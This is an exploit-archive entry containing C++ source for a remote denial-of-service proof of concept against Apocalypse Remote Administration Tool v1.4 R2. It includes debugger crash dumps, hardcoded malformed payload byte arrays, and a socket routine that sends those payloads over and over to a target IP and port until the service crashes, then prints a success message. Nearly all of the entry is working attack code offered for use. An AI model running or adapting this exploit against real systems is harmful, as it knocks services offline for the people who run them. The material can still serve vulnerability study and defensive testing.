Apocalypse Remote Administration Tool v1.4 R2 multiple vulnerabilities

2011-05-30T00:00:00
ID 1337DAY-ID-16213
Type zdt
Reporter Kevin R.V
Modified 2011-05-30T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            /*  Apocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities
 *  Author: Kevin R.V <[email protected]> 
 *    Date: 2011
 * License: Totally free 8-)
 * 
 * */
 
 
 /*
    Access violation when try to write in 0x000003F4
    EAX 00000000
	ECX 00000000
	EDX 00000000
	EBX 02E6CC88
	ESP 00103ED0
	EBP 00103F04
	ESI 00000000
	EDI 00458CA4 Client.00458CA4
	EIP 00509AB5 Client.00509AB5
	C 0  ES 0023 32bit 0(FFFFFFFF)
	P 1  CS 001B 32bit 0(FFFFFFFF)
	A 0  SS 0023 32bit 0(FFFFFFFF)
	Z 1  DS 0023 32bit 0(FFFFFFFF)
	S 0  FS 003B 32bit 7FFDE000(FFF)
	T 0  GS 0000 NULL
	D 0
	O 0  LastErr ERROR_SUCCESS (00000000)
	EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
	MM0           0.0,  1.121039e-44
	MM1 +NAN 7FFDE6F4,  8.506428e+33
	MM2 -9.846953e+26, -6.258335e+15
	MM3 -8.745139e+07,   0.005859086
	MM4 -2.466859e-33, -6.343342e-15
	MM5 -1.084202e-19,           0.0
	MM6 -2.466859e-33, -6.343342e-15
	MM7           0.0,           0.0 */

/* 

	Stack overflow

	EAX 034D1694
	ECX 00498E00 Client.00498E00
	EDX 00000690
	EBX 034D1694
	ESP 0003251C
	EBP 00033518
	ESI 021901D1
	EDI 000335D8
	EIP 0049A3DD Client.0049A3DD
	C 1  ES 0023 32bit 0(FFFFFFFF)
	P 0  CS 001B 32bit 0(FFFFFFFF)
	A 0  SS 0023 32bit 0(FFFFFFFF)
	Z 0  DS 0023 32bit 0(FFFFFFFF)
	S 0  FS 003B 32bit 7FFDE000(FFF)
	T 0  GS 0000 NULL
	D 0
	O 0  LastErr ERROR_SUCCESS (00000000)
	EFL 00010203 (NO,B,NE,BE,NS,PO,GE,G)
	MM0           0.0,  1.121039e-44
	MM1 +NAN 7FFDE6F4,  8.506428e+33
	MM2 -1.570600e-32,  5.571002e-41
	MM3     -1.196440,     -1.191965
	MM4  -0.008783944,     -1.009549
	MM5  5.791298e-39,           0.0
	MM6 -5.082198e-21,           0.0
	MM7 -7.754818e-26,           0.0 */



#include <iostream>
#include <winsock2.h>

#define VERS "0.1"

int   connected;
using namespace std;


char Access_violation[] = 
{
	0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x40,0x10,
	0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
	0x93,0xD6,0x5B,0x7F,0xA2,0xF4,0x90,0x52,0x48,0x40, 0xC1,0x88,0x2C,0x49,
	0x1A,0x57,0xD2,0xDD,0x92,0x4D,0x51,0x61,0xEF,0xBE,0x40,0x5F,0x40,
	0xF0,0x15,0x04,0x8F,0xDE,0xF5,0xE6,0x13,0x14,0xBC,0x2A,0x82,0x07,
	0xC1,0x93,0x13,0x2C,0xD8,0x43,0x85,0x7E,0xC3,0x0C,0xDF,0xCC,0xCE,
	0xCC,0xCE,0x4C,0x87,0xA5,0x19,0x13,0x9A,0x4D,0x64,0xC4,0xB2,0xEB,
	0x89,0x4A,0x80,0xE2,0x05,0x3D,0x6B,0x58,0xDD,0x0E,0xC6,0x2D,0x4B,
	0x07,0x89,0x2A,0xB8,0x48,0xCD,0x61,0xA4,0x03,0xD7,0x0F,0xFA,0x83,
	0x43,0xB3,0x6D,0xB7,0x5D,0x52,0xEF,0x68,0x42,0x9D,0x1A,0x06,0x21,
	0x7A,0x20,0x0B,0xD4,0x17,0xAA,0x60,0x59,0x96,0xC4,0x9A,0xD4,0xAC,
	0x9A,0x85,0x3A,0xD3,0x14,0x1D,0xF0,0x2B,0xF0,0xA9,0x8D,0xB5,0x3F,
	0x61,0x5C,0x94,0x56,0x70,0x75,0xAE,0xDB,0xF1,0x98,0x03,0x29,0x72,
	0x56,0xC8,0x5C,0x53,0xD2,0x22,0xDA,0x78,0xFC,0xDA,0x31,0x00,0xFA,
	0x88,0x8B,0x58,0x5E,0x2A,0x74,0x3C,0x44,0x7B,0xC3,0x5C,0x8E,0x12,
	0xA5,0xB8,0x14,0x2C,0xAB,0x6A,0x0C,0xD2,0xDD,0x0F,0x4B,0xED,0xC9,
	0x68,0x3A,0x4E,0x44,0xA1,0x10,0x13,0x31,0xF2,0x93,0xA2,0x9C,0x51,
	0x85,0x7F,0xC3,0x86,0xAE,0x8A,0x72,0x0E,0xDD,0xB9,0x5C,0xB3,0xC0,
	0xE3,0x0A,0xC5,0x8B,0xB6,0x52,0xAD,0x59,0xD4,0x95,0x62,0xC4,0xD3,
	0x69,0xCE,0x22,0xFE,0x29,0x50,0x56,0x5E,0x32,0xEC,0xC1,0x52,0xD0,
	0x2A,0x41,0x93,0x5C,0xA6,0x39,0x1B,0xB3,0x50,0xBB,0xFE,0xD2,0x6D,
	0xF5,0x1D,0xAC,0x59,0xEA,0x26,0x68,0xA3,0x41,0x1D,0xCB,0xB4,0x2D,
	0x6C,0x62,0xBB,0x45,0x5B,0x4D,0x62,0xD2,0x3A,0x26,0x96,0x51,0x83,
	0xB7,0x36,0xA5,0x26,0x06,0x10,0xE0,0x25,0xE2,0x53,0xEF,0xF9,0xFB,
	0x63,0x6B,0x77,0x56,0xAD,0xBC,0xBF,0x94,0x09,0x00,0xF7,0x66,0xEE,
	0xDD,0xDF,0x56,0x7E,0x9D,0x15,0xD6,0xB1,0x9B,0xD8,0x59,0xC4,0x1F,
	0xE0,0xC3,0x99,0xF1,0x14,0x18,0x1B,0x86,0x41,0xE9,0x8A,0xE4,0xA5,
	0xD0,0xC9,0xC5,0xEB,0xDB,0x36,0xF8,0xFF,0xCC,0xE7,0x8D,0xE7,0x9E,
	0xFE,0x01,0xF0,0xF2,0xA8,0x97
};

char stack[] =
{
	0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x00,0x10,
	0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
};
	



int PoC(char * host, unsigned int port, unsigned int vuln)
{
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0),&wsa);
	SOCKET sock;
    struct sockaddr_in  local;
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	local.sin_family = AF_INET;
	local.sin_addr.s_addr = inet_addr(host);
	local.sin_port = htons(port);
	if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
	{
		    connected = 1;
		    cout << ".";
		    for(int i = 0; i<99; i++)
		    {
				if ( vuln == 0 )
				sendto(sock, Access_violation, sizeof(Access_violation), 0, (struct sockaddr *)&local,sizeof(local));
				else
				sendto(sock, stack, sizeof(stack), 0, (struct sockaddr *)&local,sizeof(local));
			}

			
			PoC(host, port, vuln);
	}
	
	else
	{
		if ( connected )
		cout << endl << endl << "[+] Congrats Apocalypse crashed!" << endl;
		else
		cout << endl << endl << "[-] Sorry not Apocalypse detected :(" << endl;
	}
}
int main(int argc, char *argv[])

{
	cout << "\nApocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities" VERS << endl << endl;
	cout << "by Kevin R.V <[email protected]" << endl;
	if ( argc < 6 )
	{
		cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port> -v <vuln type>" << endl << endl;
		cout << "vuln list : " << endl;
		cout << "0- Access violation, try to write in not allowed memory" << endl;
		cout << "1- Stack overflow" << endl;
		exit(-1);
	}
	
	u_short port;
	char * ip;
	
	u_short v_type = 0;
	
	for(int i = 0; i<argc; i++)
	{
		if( ! strcmp(argv[i], "-h") != 0 )
		ip = argv[i+1];
		else if( ! strcmp(argv[i], "-p") != 0 )
		port = atoi(argv[i+1]);
		else if( ! strcmp(argv[i], "-v") != 0 )
		v_type = atoi(argv[i+1]);
	}
	
	cout << "[+] Starting exploit" << endl << endl;
	PoC(ip, port, v_type);
	
	
	return 1;
}



#  0day.today [2018-03-28]  #